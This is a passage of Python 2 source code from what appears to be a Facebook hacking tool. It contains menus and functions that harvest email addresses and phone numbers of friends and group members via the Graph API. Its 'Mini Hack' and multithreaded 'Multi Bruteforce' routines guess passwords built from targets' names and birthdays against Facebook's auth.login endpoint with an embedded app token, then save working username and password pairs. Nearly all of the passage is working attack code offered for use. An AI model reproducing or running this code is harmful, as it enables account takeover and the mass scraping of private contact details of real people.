print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM GRUP #####
def em_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;93m║--\033[1;93m> \033[1;93m1.\033[1;94m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m2.\033[1;94m Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m3.\033[1;94m Super Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m4.\033[1;94m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m5.\033[1;94m Yahoo Checker"
print "\033[1;93m║--\033[1;93m> \033[1;93m0.\033[1;94m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;95m╚═\033[1;95mD \033[1;95m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\n with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+gaz
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mCP✚\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(1)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;95m║--\033[1;91m> \033[1;96m1.\033[1;93m Crack with list friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m2.\033[1;93m Crack from friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m3.\033[1;93m Crack from member group"
print "\033[1;95m║--\033[1;91m> \033[1;96m0.\033[1;93m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
